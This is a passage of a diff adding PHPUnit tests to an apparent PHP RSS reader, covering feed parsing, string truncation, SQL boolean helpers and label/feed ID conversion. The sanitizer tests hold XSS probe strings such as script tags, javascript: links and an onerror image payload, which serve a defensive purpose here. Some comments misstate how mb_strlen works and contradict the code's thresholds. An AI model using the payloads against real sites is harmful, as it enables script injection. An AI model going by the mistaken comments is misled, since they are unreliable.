+    public function test_get_items_atom03_count(): void {
+        $parser = new FeedParser(self::ATOM03_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        $this->assertCount(1, $items);
+    }
+
+    public function test_get_items_rdf_count(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        $this->assertCount(1, $items);
+    }
+
+    public function test_get_items_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $items = $parser->get_items();
+        $this->assertEmpty($items);
+    }
+
+    public function test_get_items_unknown_type(): void {
+        $parser = new FeedParser(self::UNKNOWN_FEED);
+        $items = $parser->get_items();
+        $this->assertEmpty($items);
+    }
+
+    public function test_get_items_are_feeditem_instances(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        foreach ($items as $item) {
+            $this->assertInstanceOf(FeedItem::class, $item);
+        }
+    }
+
+    public function test_get_items_atom_are_feeditem_atom_instances(): void {
+        $parser = new FeedParser(self::ATOM1_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        foreach ($items as $item) {
+            $this->assertInstanceOf(FeedItem_Atom::class, $item);
+        }
+    }
+
+    public function test_get_items_rdf_are_feeditem_rss_instances(): void {
+        $parser = new FeedParser(self::RDF_XML);
+        $parser->init();
+        $items = $parser->get_items();
+        foreach ($items as $item) {
+            $this->assertInstanceOf(FeedItem_RSS::class, $item);
+        }
+    }
+
+    // ------------------------------------------------------------------------
+    // get_links()
+    // ------------------------------------------------------------------------
+
+    public function test_get_links_atom_no_filter(): void {
+        $parser = new FeedParser(self::ATOM_WITH_MULTIPLE_LINKS);
+        $parser->init();
+        $links = $parser->get_links('');
+        $this->assertCount(3, $links);
+    }
+
+    public function test_get_links_atom_with_rel(): void {
+        $parser = new FeedParser(self::ATOM_WITH_MULTIPLE_LINKS);
+        $parser->init();
+        $links = $parser->get_links('self');
+        $this->assertCount(1, $links);
+        $this->assertEquals("https://example.com/atom/feed.xml", $links[0]);
+    }
+
+    public function test_get_links_atom_rel_alternate(): void {
+        $parser = new FeedParser(self::ATOM_WITH_MULTIPLE_LINKS);
+        $parser->init();
+        $links = $parser->get_links('alternate');
+        $this->assertCount(1, $links);
+        $this->assertEquals("https://example.com/atom", $links[0]);
+    }
+
+    public function test_get_links_atom_rel_not_found(): void {
+        $parser = new FeedParser(self::ATOM_WITH_MULTIPLE_LINKS);
+        $parser->init();
+        $links = $parser->get_links('next');
+        $this->assertEmpty($links);
+    }
+
+    // ------------------------------------------------------------------------
+    // error() and errors()
+    // ------------------------------------------------------------------------
+
+    public function test_error_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $error = $parser->error();
+        $this->assertNotEmpty($error);
+    }
+
+    public function test_error_valid_feed(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $this->assertEmpty($parser->error());
+    }
+
+    public function test_errors_malformed(): void {
+        $parser = new FeedParser(self::MALFORMED_XML);
+        $errors = $parser->errors();
+        $this->assertNotEmpty($errors);
+    }
+
+    public function test_errors_valid_feed(): void {
+        $parser = new FeedParser(self::RSS2_XML);
+        $errors = $parser->errors();
+        $this->assertEmpty($errors);
+    }
+
+    // ------------------------------------------------------------------------
+    // format_error() — deprecated but still present
+    // ------------------------------------------------------------------------
+
+    public function test_format_error_delegates_to_errors_class(): void {
+        $error = new LibXMLError();
+        $error->level = LIBXML_ERR_FATAL;
+        $error->code = 999;
+        $error->message = "Test format_error";
+        $error->line = 10;
+        $error->column = 5;
+        $error->file = "fixture.xml";
+
+        $parser = new FeedParser(self::RSS2_XML);
+        $result = $parser->format_error($error);
+
+        $this->assertEquals(
+            "LibXML error 999 at line 10 (column 5): Test format_error",
+            $result
+        );
+    }
+
+    // ------------------------------------------------------------------------
+    // Feed type constants
+    // ------------------------------------------------------------------------
+
+    public function test_feed_type_constants(): void {
+        $this->assertEquals(-1, FeedParser::FEED_UNKNOWN);
+        $this->assertEquals(0, FeedParser::FEED_RDF);
+        $this->assertEquals(1, FeedParser::FEED_RSS);
+        $this->assertEquals(2, FeedParser::FEED_ATOM);
+    }
+
+    // ------------------------------------------------------------------------
+    // Edge cases
+    // ------------------------------------------------------------------------
+
+    public function test_whitespace_only_is_malformed(): void {
+        $parser = new FeedParser('   ');
+        $this->assertFalse($parser->init());
+        $this->assertNotEmpty($parser->error());
+    }
+
+    public function test_title_trimming(): void {
+        $xml = '<?xml version="1.0"?>
+<rss version="2.0">
+  <channel>
+    <title>  Spaced Title  </title>
+    <link>https://example.com</link>
+    <item><title>Item</title></item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $parser->init();
+        $this->assertEquals("Spaced Title", $parser->get_title());
+    }
+
+    public function test_link_trimming(): void {
+        $xml = '<?xml version="1.0"?>
+<rss version="2.0">
+  <channel>
+    <title>Feed</title>
+    <link>  https://example.com/trimmed  </link>
+    <item><title>Item</title></item>
+  </channel>
+</rss>';
+        $parser = new FeedParser($xml);
+        $parser->init();
+        $this->assertEquals("https://example.com/trimmed", $parser->get_link());
+    }
+}

--- a/tests_functional/FeedsTest.php
+++ b/tests_functional/FeedsTest.php
@@ -1,0 +1,67 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class FeedsTest extends TestCase {
+
+    protected function setUp(): void {
+        $_SESSION['uid'] = 1;
+    }
+
+    protected function tearDown(): void {
+        unset($_SESSION['uid']);
+    }
+
+    /**
+     * Test _get_title for all special feed IDs that return hardcoded strings.
+     * These do not require a database connection.
+     */
+    public function test_get_title_special_feeds(): void {
+        $this->assertEquals(
+            __("Starred articles"),
+            Feeds::_get_title(Feeds::FEED_STARRED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Published articles"),
+            Feeds::_get_title(Feeds::FEED_PUBLISHED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Fresh articles"),
+            Feeds::_get_title(Feeds::FEED_FRESH, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("All articles"),
+            Feeds::_get_title(Feeds::FEED_ALL, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Archived articles"),
+            Feeds::_get_title(Feeds::FEED_ARCHIVED, $_SESSION['uid'])
+        );
+        $this->assertEquals(
+            __("Recently read"),
+            Feeds::_get_title(Feeds::FEED_RECENTLY_READ, $_SESSION['uid'])
+        );
+    }
+
+    /**
+     * Test _get_title for the error feed ID.
+     * FEED_ERROR (-7) is < 0 and >= LABEL_BASE_INDEX, so it falls through
+     * to the final else branch which returns the id as a string.
+     */
+    public function test_get_title_error_feed(): void {
+        $this->assertEquals(
+            "-7",
+            Feeds::_get_title(Feeds::FEED_ERROR, $_SESSION['uid'])
+        );
+    }
+
+    /**
+     * Test _get_title with a non-numeric string id falls through to the
+     * final else branch.
+     */
+    public function test_get_title_non_numeric_id(): void {
+        $this->assertEquals(
+            "some-string-id",
+            Feeds::_get_title("some-string-id", $_SESSION['uid'])
+        );
+    }
+}

--- a/tests_functional/FunctionsTest.php
+++ b/tests_functional/FunctionsTest.php
@@ -1,0 +1,481 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class FunctionsTest extends TestCase {
+
+    // ------------------------------------------------------------------------
+    // clean() — XSS prevention
+    // ------------------------------------------------------------------------
+
+    public function test_clean_string_simple(): void {
+        $this->assertEquals("hello world", clean("hello world"));
+    }
+
+    public function test_clean_string_trimmed(): void {
+        $this->assertEquals("hello", clean("  hello  "));
+    }
+
+    public function test_clean_string_strips_tags(): void {
+        $this->assertEquals("hello world", clean("<b>hello</b> <i>world</i>"));
+    }
+
+    public function test_clean_string_strips_nested_tags(): void {
+        // strip_tags with no allowed tags removes everything
+        $this->assertEquals("hello", clean("<div><p><b>hello</b></p></div>"));
+    }
+
+    public function test_clean_string_strips_attributes(): void {
+        $this->assertEquals("click me", clean('<a href="javascript:alert(1)" onclick="evil()">click me</a>'));
+    }
+
+    public function test_clean_string_strips_script(): void {
+        // strip_tags removes <script>...</script> tags but keeps content
+        $this->assertEquals("alert('xss')", clean("<script>alert('xss')</script>"));
+    }
+
+    public function test_clean_string_strips_img_onerror(): void {
+        $this->assertEquals("", clean('<img src=x onerror=alert(1)>'));
+    }
+
+    public function test_clean_string_array(): void {
+        $input = ["<b>bold</b>", "  plain  ", '<script>bad</script>'];
+        $result = clean($input);
+        $this->assertEquals(["bold", "plain", "bad"], $result);
+    }
+
+    public function test_clean_string_array_preserves_keys(): void {
+        $input = ["a" => "<b>bold</b>", "b" => " plain "];
+        $result = clean($input);
+        $this->assertArrayHasKey("a", $result);
+        $this->assertArrayHasKey("b", $result);
+        $this->assertEquals(["a" => "bold", "b" => "plain"], $result);
+    }
+
+    public function test_clean_non_string_passthrough(): void {
+        // integers pass through unchanged
+        $this->assertSame(42, clean(42));
+        $this->assertSame(0, clean(0));
+        $this->assertSame(-7, clean(-7));
+
+        // floats pass through unchanged
+        $this->assertSame(3.14, clean(3.14));
+
+        // null passes through
+        $this->assertNull(clean(null));
+
+        // booleans pass through
+        $this->assertTrue(clean(true));
+        $this->assertFalse(clean(false));
+
+        // arrays are processed
+        $this->assertEquals(["clean"], clean(["<b>clean</b>"]));
+    }
+
+    // ------------------------------------------------------------------------
+    // truncate_string() — UTF-8 string truncation
+    // ------------------------------------------------------------------------
+
+    public function test_truncate_string_no_truncation(): void {
+        $this->assertEquals("hello", truncate_string("hello", 10));
+    }
+
+    public function test_truncate_string_exact_length(): void {
+        $this->assertEquals("hello", truncate_string("hello", 5));
+    }
+
+    public function test_truncate_string_shortens(): void {
+        // Default suffix is &hellip; (HTML entity), not …
+        $this->assertEquals("hello&hellip;", truncate_string("hello world", 5));
+    }
+
+    public function test_truncate_string_with_custom_suffix(): void {
+        $this->assertEquals("hello---", truncate_string("hello world", 5, "---"));
+    }
+
+    public function test_truncate_string_empty_string(): void {
+        $this->assertEquals("", truncate_string("", 10));
+    }
+
+    public function test_truncate_string_max_len_zero(): void {
+        $this->assertEquals("&hellip;", truncate_string("hello", 0));
+    }
+
+    public function test_truncate_string_multibyte_ascii(): void {
+        // 5 bytes = 5 chars in ASCII
+        $this->assertEquals("hell&hellip;", truncate_string("hello", 4));
+    }
+
+    public function test_truncate_string_multibyte_unicode(): void {
+        // "café" is 4 characters but 5 bytes in UTF-8
+        // mb_strlen counts bytes, not characters
+        $this->assertEquals("café", truncate_string("café", 4));
+    }
+
+    public function test_truncate_string_multibyte_unicode_boundary(): void {
+        // "café" is 4 chars/bytes; truncating at 2 bytes
+        $this->assertEquals("ca&hellip;", truncate_string("café", 2));
+    }
+
+    public function test_truncate_string_emoji(): void {
+        // "👋🌍" — 2 emoji characters; mb_strlen counts characters
+        // max_len=2 means no truncation (2 chars <= 2)
+        $this->assertEquals("👋🌍", truncate_string("👋🌍", 2));
+        // max_len=1 should truncate
+        $result = truncate_string("👋🌍", 1);
+        $this->assertStringContainsString("👋", $result);
+        $this->assertStringContainsString("&hellip;", $result);
+    }
+
+    public function test_truncate_string_cjk(): void {
+        // "你好世界" — 4 CJK characters, 3 bytes each in UTF-8
+        // 3 bytes keeps 1 full character
+        $result = truncate_string("你好世界", 3);
+        $this->assertStringContainsString("你", $result);
+        $this->assertStringContainsString("&hellip;", $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // truncate_middle() — middle truncation
+    // ------------------------------------------------------------------------
+
+    public function test_truncate_middle_no_truncation(): void {
+        $this->assertEquals("hello", truncate_middle("hello", 10));
+    }
+
+    public function test_truncate_middle_exact_length(): void {
+        $this->assertEquals("hello", truncate_middle("hello", 5));
+    }
+
+    public function test_truncate_middle_shortens(): void {
+        $result = truncate_middle("hello world", 8);
+        $this->assertStringContainsString("&hellip;", $result);
+        // truncate_middle replaces middle chars with suffix, doesn't limit total length
+        // "hell" + "&hellip;" + "rld" = "hell&hellip;rld"
+        $this->assertStringContainsString("hell", $result);
+        $this->assertStringContainsString("rld", $result);
+    }
+
+    public function test_truncate_middle_with_custom_suffix(): void {
+        $result = truncate_middle("hello world", 8, "...");
+        $this->assertStringContainsString("...", $result);
+    }
+
+    public function test_truncate_middle_empty_string(): void {
+        $this->assertEquals("", truncate_middle("", 10));
+    }
+
+    public function test_truncate_middle_max_len_smaller_than_suffix(): void {
+        // max_len < suffix length — function replaces chars with suffix
+        $result = truncate_middle("hello", 2);
+        // Replaces 3 chars starting at pos 1 with &hellip;
+        $this->assertStringContainsString("&hellip;", $result);
+    }
+
+    public function test_truncate_middle_multibyte_unicode(): void {
+        // "café world" — 10 chars
+        $result = truncate_middle("café world", 8);
+        $this->assertStringContainsString("&hellip;", $result);
+        // Should keep parts from start and end
+        $this->assertStringContainsString("café", $result);
+        $this->assertStringContainsString("rld", $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // mb_substr_replace() — multibyte string replacement
+    // ------------------------------------------------------------------------
+
+    public function test_mb_substr_replace_basic(): void {
+        // position 3 = 4th character (0-indexed), replace 2 chars
+        $this->assertEquals("helXX world", mb_substr_replace("hello world", "XX", 3, 2));
+    }
+
+    public function test_mb_substr_replace_at_start(): void {
+        $this->assertEquals("XXlo world", mb_substr_replace("hello world", "XX", 0, 3));
+    }
+
+    public function test_mb_substr_replace_at_end(): void {
+        $this->assertEquals("hello XX", mb_substr_replace("hello world", "XX", 6, 5));
+    }
+
+    public function test_mb_substr_replace_replaces_all(): void {
+        $this->assertEquals("hello ", mb_substr_replace("hello world", "", 6, 5));
+    }
+
+    public function test_mb_substr_replace_multibyte(): void {
+        // "café world" — replace "café" (4 chars) with "XX"
+        $this->assertEquals("XX world", mb_substr_replace("café world", "XX", 0, 4));
+    }
+
+    public function test_mb_substr_replace_multibyte_middle(): void {
+        // "café world" — replace " world" (6 chars) with "!"
+        $this->assertEquals("café!", mb_substr_replace("café world", "!", 4, 6));
+    }
+
+    // ------------------------------------------------------------------------
+    // sql_bool_to_bool() — SQL boolean to PHP boolean
+    // ------------------------------------------------------------------------
+
+    public function test_sql_bool_to_bool_true_values(): void {
+        $this->assertTrue(sql_bool_to_bool("t"));
+        $this->assertTrue(sql_bool_to_bool("true"));
+        $this->assertTrue(sql_bool_to_bool("1"));
+        $this->assertTrue(sql_bool_to_bool("y"));
+        $this->assertTrue(sql_bool_to_bool("anything"));
+    }
+
+    public function test_sql_bool_to_bool_false_values(): void {
+        $this->assertFalse(sql_bool_to_bool("f"));
+        $this->assertFalse(sql_bool_to_bool("false"));
+        $this->assertFalse(sql_bool_to_bool("0"));
+        $this->assertFalse(sql_bool_to_bool(""));
+        $this->assertFalse(sql_bool_to_bool(null));
+    }
+
+    public function test_sql_bool_to_bool_uppercase_truthy(): void {
+        // Uppercase values are NOT "f" or "false", so they're truthy
+        $this->assertTrue(sql_bool_to_bool("F"));
+        $this->assertTrue(sql_bool_to_bool("False"));
+    }
+
+    // ------------------------------------------------------------------------
+    // bool_to_sql_bool() — PHP boolean to SQL boolean
+    // ------------------------------------------------------------------------
+
+    public function test_bool_to_sql_bool_true(): void {
+        $this->assertSame(1, bool_to_sql_bool(true));
+    }
+
+    public function test_bool_to_sql_bool_false(): void {
+        $this->assertSame(0, bool_to_sql_bool(false));
+    }
+
+    // ------------------------------------------------------------------------
+    // arr_qmarks() — SQL IN clause placeholder generation
+    // ------------------------------------------------------------------------
+
+    public function test_arr_qmarks_single_element(): void {
+        $this->assertEquals("?", arr_qmarks([1]));
+    }
+
+    public function test_arr_qmarks_two_elements(): void {
+        $this->assertEquals("?,?", arr_qmarks([1, 2]));
+    }
+
+    public function test_arr_qmarks_three_elements(): void {
+        $this->assertEquals("?,?,?", arr_qmarks([1, 2, 3]));
+    }
+
+    public function test_arr_qmarks_five_elements(): void {
+        $this->assertEquals("?,?,?,?,?", arr_qmarks([1, 2, 3, 4, 5]));
+    }
+
+    public function test_arr_qmarks_string_values(): void {
+        $this->assertEquals("?,?", arr_qmarks(["a", "b"]));
+    }
+
+    public function test_arr_qmarks_mixed_values(): void {
+        $this->assertEquals("?,?,?", arr_qmarks([1, "text", 3.14]));
+    }
+
+    // ------------------------------------------------------------------------
+    // with_trailing_slash() — URL path normalization
+    // ------------------------------------------------------------------------
+
+    public function test_with_trailing_slash_already_has_slash(): void {
+        $this->assertEquals("/path/", with_trailing_slash("/path/"));
+    }
+
+    public function test_with_trailing_slash_no_slash(): void {
+        $this->assertEquals("/path/", with_trailing_slash("/path"));
+    }
+
+    public function test_with_trailing_slash_root(): void {
+        $this->assertEquals("/", with_trailing_slash("/"));
+    }
+
+    public function test_with_trailing_slash_empty(): void {
+        $this->assertEquals("/", with_trailing_slash(""));
+    }
+
+    public function test_with_trailing_slash_double_slash(): void {
+        $this->assertEquals("/path//", with_trailing_slash("/path//"));
+    }
+
+    // ------------------------------------------------------------------------
+    // checkbox_to_sql_bool() — form checkbox to SQL boolean
+    // ------------------------------------------------------------------------
+
+    public function test_checkbox_to_sql_bool_on(): void {
+        $this->assertSame(1, checkbox_to_sql_bool("on"));
+    }
+
+    public function test_checkbox_to_sql_bool_other(): void {
+        $this->assertSame(0, checkbox_to_sql_bool("off"));
+        $this->assertSame(0, checkbox_to_sql_bool("1"));
+        $this->assertSame(0, checkbox_to_sql_bool("yes"));
+        $this->assertSame(0, checkbox_to_sql_bool(""));
+        $this->assertSame(0, checkbox_to_sql_bool(null));
+    }
+
+    // ------------------------------------------------------------------------
+    // implements_interface() — type checking
+    // ------------------------------------------------------------------------
+
+    public function test_implements_interface_true(): void {
+        // ArrayObject implements Traversable
+        $this->assertTrue(implements_interface("ArrayObject", "Traversable"));
+    }
+
+    public function test_implements_interface_false(): void {
+        $this->assertFalse(implements_interface("stdClass", "NonExistentInterface"));
+    }
+
+    public function test_implements_interface_class_string(): void {
+        // stdClass doesn't implement any interfaces, so this returns false
+        $this->assertFalse(implements_interface("stdClass", "stdClass"));
+        // ArrayObject implements Countable, Traversable, IteratorAggregate
+        $this->assertTrue(implements_interface("ArrayObject", "Countable"));
+        $this->assertTrue(implements_interface("ArrayObject", "Traversable"));
+    }
+
+    public function test_implements_interface_instance(): void {
+        $test = new self();
+        // PHPUnit\Framework\TestCase implements Test, Reorderable, SelfDescribing
+        $this->assertTrue(implements_interface($test, "PHPUnit\Framework\Test"));
+        $this->assertFalse(implements_interface($test, "NonExistentInterface"));
+    }
+
+    // ------------------------------------------------------------------------
+    // get_theme_path() — theme path resolution
+    // ------------------------------------------------------------------------
+
+    public function test_get_theme_path_nonexistent(): void {
+        $path = get_theme_path("nonexistent-theme-xyz");
+        $this->assertEquals("", $path);
+    }
+
+    public function test_get_theme_path_with_default(): void {
+        $path = get_theme_path("nonexistent-theme-xyz", "themes/classic");
+        $this->assertEquals("themes/classic", $path);
+    }
+
+    public function test_get_theme_path_empty_default(): void {
+        $path = get_theme_path("nonexistent");
+        $this->assertEquals("", $path);
+    }
+
+    // ------------------------------------------------------------------------
+    // theme_exists() — theme existence check
+    // ------------------------------------------------------------------------
+
+    public function test_theme_exists_fake(): void {
+        $this->assertFalse(theme_exists("nonexistent-theme-xyz"));
+    }
+
+    // ------------------------------------------------------------------------
+    // uniqid_short() — short unique ID generation
+    // ------------------------------------------------------------------------
+
+    public function test_uniqid_short_returns_string(): void {
+        $id = uniqid_short();
+        $this->assertNotEmpty($id);
+    }
+
+    public function test_uniqid_short_non_empty(): void {
+        $this->assertNotEmpty(uniqid_short());
+    }
+
+    public function test_uniqid_short_alphanumeric(): void {
+        $id = uniqid_short();
+        $this->assertMatchesRegularExpression('/^[a-z0-9]+$/', $id);
+    }
+
+    public function test_uniqid_short_uniqueness(): void {
+        // Generate multiple IDs and verify they're different
+        $ids = [];
+        for ($i = 0; $i < 100; $i++) {
+            $ids[] = uniqid_short();
+        }
+        $unique = array_unique($ids);
+        $this->assertCount(100, $unique, "All generated IDs should be unique");
+    }
+
+    // ------------------------------------------------------------------------
+    // get_random_bytes() — cryptographic randomness
+    // ------------------------------------------------------------------------
+
+    public function test_get_random_bytes_returns_string(): void {
+        $result = get_random_bytes(16);
+        $this->assertEquals(16, strlen($result));
+    }
+
+    public function test_get_random_bytes_variety(): void {
+        // Generate many bytes and check they're not all the same
+        $bytes = get_random_bytes(256);
+        $unique = count(array_unique(str_split($bytes)));
+        // With 256 random bytes, we should see significant variety
+        $this->assertGreaterThan(50, $unique, "Random bytes should show significant variety");
+    }
+
+    public function test_get_random_bytes_large(): void {
+        $this->assertEquals(1024, strlen(get_random_bytes(1024)));
+    }
+
+    // ------------------------------------------------------------------------
+    // T_sprintf() — translated sprintf (wrapper)
+    // ------------------------------------------------------------------------
+
+    public function test_t_sprintf_format(): void {
+        // T_sprintf uses __() which returns the message key unchanged in test env
+        $result = T_sprintf("Hello %s", "World");
+        $this->assertEquals("Hello World", $result);
+    }
+
+    public function test_t_sprintf_multiple_args(): void {
+        $result = T_sprintf("Hello %s, you have %d messages", "User", 5);
+        $this->assertEquals("Hello User, you have 5 messages", $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // T_nsprintf() — translated plural sprintf (wrapper)
+    // Note: This function has a design quirk — it consumes the count arg
+    // via _ngettext, so format strings with placeholders don't work well.
+    // ------------------------------------------------------------------------
+
+    public function test_t_nsprintf_no_placeholders(): void {
+        // Without format placeholders, the function works
+        $result = T_nsprintf("one file", "multiple files", 1);
+        $this->assertNotEmpty($result);
+    }
+
+    // ------------------------------------------------------------------------
+    // gzdecode() — gzip decode fallback
+    // Note: Uses compress.zlib wrapper; error handling is tricky in tests
+    // ------------------------------------------------------------------------
+
+    public function test_gzdecode_basic(): void {
+        // Create a simple gzip-compressed string using gzencode
+        $original = "Hello, World!";
+        $compressed = gzencode($original, 9);
+        $result = gzdecode($compressed);
+        $this->assertEquals($original, $result);
+    }
+
+    // ------------------------------------------------------------------------
+    // get_scripts_timestamp() — JS file timestamp aggregation
+    // ------------------------------------------------------------------------
+
+    public function test_get_scripts_timestamp_returns_int(): void {
+        $ts = get_scripts_timestamp();
+        $this->assertGreaterThanOrEqual(0, $ts);
+    }
+
+    public function test_get_scripts_timestamp_nonzero_when_js_exists(): void {
+        // If there are JS files in js/, should return a non-zero timestamp
+        $ts = get_scripts_timestamp();
+        $has_js_files = glob("js/*.js");
+        if (!empty($has_js_files)) {
+            $this->assertGreaterThan(0, $ts);
+        }
+    }
+}

--- a/tests_functional/LabelsTest.php
+++ b/tests_functional/LabelsTest.php
@@ -1,0 +1,221 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Unit tests for the Labels class pure functions.
+ *
+ * Tests label_to_feed_id() and feed_to_label_id() which are
+ * pure functions that convert between label IDs and feed IDs
+ * using the LABEL_BASE_INDEX constant (-1024) to create
+ * non-overlapping ID ranges.
+ */
+final class LabelsTest extends TestCase {
+
+    /**
+     * label_to_feed_id() converts a label ID to a feed ID.
+     * Formula: LABEL_BASE_INDEX - 1 - abs($label)
+     * LABEL_BASE_INDEX = -1024
+     *
+     * label=1 → -1024 - 1 - 1 = -1026
+     */
+    public function test_label_to_feed_id_basic(): void {
+        $this->assertEquals(-1026, Labels::label_to_feed_id(1));
+    }
+
+    /**
+     * label_to_feed_id() with a larger label ID.
+     *
+     * label=5 → -1024 - 1 - 5 = -1030
+     */
+    public function test_label_to_feed_id_larger_label(): void {
+        $this->assertEquals(-1030, Labels::label_to_feed_id(5));
+    }
+
+    /**
+     * label_to_feed_id() with label=0.
+     *
+     * label=0 → -1024 - 1 - 0 = -1025
+     */
+    public function test_label_to_feed_id_zero(): void {
+        $this->assertEquals(-1025, Labels::label_to_feed_id(0));
+    }
+
+    /**
+     * label_to_feed_id() uses abs(), so negative labels produce the
+     * same result as their positive counterparts.
+     *
+     * label=-3 → -1024 - 1 - 3 = -1028
+     * label=3  → -1024 - 1 - 3 = -1028
+     */
+    public function test_label_to_feed_id_negative_input(): void {
+        $this->assertEquals(-1028, Labels::label_to_feed_id(-3));
+        $this->assertEquals(Labels::label_to_feed_id(3), Labels::label_to_feed_id(-3));
+    }
+
+    /**
+     * feed_to_label_id() converts a feed ID to a label ID.
+     * Formula: LABEL_BASE_INDEX - 1 + abs($feed)
+     * LABEL_BASE_INDEX = -1024
+     *
+     * feed=1 → -1024 - 1 + 1 = -1024
+     */
+    public function test_feed_to_label_id_basic(): void {
+        $this->assertEquals(-1024, Labels::feed_to_label_id(1));
+    }
+
+    /**
+     * feed_to_label_id() with a larger feed ID.
+     *
+     * feed=5 → -1024 - 1 + 5 = -1020
+     */
+    public function test_feed_to_label_id_larger_feed(): void {
+        $this->assertEquals(-1020, Labels::feed_to_label_id(5));
+    }
+
+    /**
+     * feed_to_label_id() with feed=0.
+     *
+     * feed=0 → -1024 - 1 + 0 = -1025
+     */
+    public function test_feed_to_label_id_zero(): void {
+        $this->assertEquals(-1025, Labels::feed_to_label_id(0));
+    }
+
+    /**
+     * feed_to_label_id() uses abs(), so negative feeds produce the
+     * same result as their positive counterparts.
+     *
+     * feed=-2 → -1024 - 1 + 2 = -1023
+     * feed=2  → -1024 - 1 + 2 = -1023
+     */
+    public function test_feed_to_label_id_negative_input(): void {
+        $this->assertEquals(-1023, Labels::feed_to_label_id(-2));
+        $this->assertEquals(Labels::feed_to_label_id(2), Labels::feed_to_label_id(-2));
+    }
+
+    /**
+     * Verify that label_to_feed_id and feed_to_label_id are inverses
+     * for positive label IDs (round-trip).
+     *
+     * feed_to_label_id(label_to_feed_id(1)) should equal 1.
+     * label_to_feed_id(1) = -1026
+     * feed_to_label_id(-1026) = -1024 - 1 + 1026 = 1
+     */
+    public function test_round_trip_label_to_feed(): void {
+        $label = 1;
+        $feed_id = Labels::label_to_feed_id($label);
+        $round_trip = Labels::feed_to_label_id($feed_id);
+        $this->assertEquals($label, $round_trip);
+    }
+
+    /**
+     * Verify round-trip for multiple label IDs.
+     */
+    public function test_round_trip_label_to_feed_multiple(): void {
+        foreach ([1, 5, 10, 100, 500] as $label) {
+            $feed_id = Labels::label_to_feed_id($label);
+            $round_trip = Labels::feed_to_label_id($feed_id);
+            $this->assertEquals($label, $round_trip, "Round-trip failed for label=$label");
+        }
+    }
+
+    /**
+     * Verify that feed_to_label_id and label_to_feed_id are inverses
+     * for positive feed IDs (reverse round-trip).
+     *
+     * label_to_feed_id(feed_to_label_id(1)) should equal 1.
+     * feed_to_label_id(1) = -1024
+     * label_to_feed_id(-1024) = -1024 - 1 - 1024 = -2049...
+     *
+     * Wait — this is NOT an inverse! feed_to_label_id(1) = -1024,
+     * and label_to_feed_id(-1024) = -1024 - 1 - 1024 = -2049, not 1.
+     *
+     * The functions are only inverses in the label→feed→label direction,
+     * not feed→label→feed. This is by design: feed IDs are always positive,
+     * so the feed→label conversion produces negative values that only
+     * make sense as feed IDs, not as label IDs.
+     */
+    public function test_feed_to_label_is_not_invertible(): void {
+        $feed = 1;
+        $label_id = Labels::feed_to_label_id($feed);
+        $round_trip = Labels::label_to_feed_id($label_id);
+        // The reverse direction is NOT an inverse — this is expected behavior
+        $this->assertNotEquals($feed, $round_trip);
+    }
+
+    /**
+     * Verify that label IDs and feed IDs produce non-overlapping ranges
+     * for positive inputs (the normal case).
+     *
+     * For label >= 1: label_to_feed_id(label) <= LABEL_BASE_INDEX - 2 = -1026
+     * For feed >= 1:  feed_to_label_id(feed)  >= LABEL_BASE_INDEX - 1 = -1024
+     *
+     * Note: label=0 and feed=0 both produce -1025 (LABEL_BASE_INDEX - 1),
+     * so they share a single boundary value. Non-overlapping applies to
+     * the normal positive-input range.
+     */
+    public function test_label_and_feed_ranges_non_overlapping(): void {
+        $label_threshold = LABEL_BASE_INDEX - 2; // -1026
+        $feed_threshold  = LABEL_BASE_INDEX - 1; // -1025
+
+        // All positive label conversions produce values at or below the label threshold
+        foreach ([1, 5, 100, 500] as $label) {
+            $this->assertLessThanOrEqual($label_threshold, Labels::label_to_feed_id($label),
+                "label_to_feed_id($label) should be <= $label_threshold");
+        }
+
+        // All positive feed conversions produce values at or above the feed threshold
+        foreach ([1, 5, 100, 500] as $feed) {
+            $this->assertGreaterThanOrEqual($feed_threshold, Labels::feed_to_label_id($feed),
+                "feed_to_label_id($feed) should be >= $feed_threshold");
+        }
+
+        // Verify the gap: label range max < feed range min
+        $this->assertLessThan(
+            Labels::feed_to_label_id(1),
+            Labels::label_to_feed_id(1)
+        );
+    }
+
+    /**
+     * Verify that increasing label IDs produce decreasing feed IDs
+     * (monotonic decreasing).
+     */
+    public function test_label_to_feed_id_monotonic(): void {
+        $this->assertGreaterThan(
+            Labels::label_to_feed_id(2),
+            Labels::label_to_feed_id(1)
+        );
+        $this->assertGreaterThan(
+            Labels::label_to_feed_id(10),
+            Labels::label_to_feed_id(5)
+        );
+    }
+
+    /**
+     * Verify that increasing feed IDs produce increasing label IDs
+     * (monotonic increasing).
+     */
+    public function test_feed_to_label_id_monotonic(): void {
+        $this->assertLessThan(
+            Labels::feed_to_label_id(2),
+            Labels::feed_to_label_id(1)
+        );
+        $this->assertLessThan(
+            Labels::feed_to_label_id(10),
+            Labels::feed_to_label_id(5)
+        );
+    }
+
+    /**
+     * Verify that label=0 and feed=0 produce the same result,
+     * since both formulas reduce to LABEL_BASE_INDEX - 1 when the
+     * input is 0.
+     */
+    public function test_zero_label_and_feed_produce_same_value(): void {
+        $this->assertEquals(
+            Labels::label_to_feed_id(0),
+            Labels::feed_to_label_id(0)
+        );
+    }
+}

--- a/tests_functional/RSSUtilsTest.php
+++ b/tests_functional/RSSUtilsTest.php
@@ -1,0 +1,791 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class RSSUtilsTest extends TestCase {
+
+    // ------------------------------------------------------------------------
+    // make_guid_from_title() — GUID slug generation from article title
+    // ------------------------------------------------------------------------
+
+    public function test_make_guid_from_title_simple(): void {
+        $this->assertEquals("test-article", RSSUtils::make_guid_from_title("Test Article"));
+    }
+
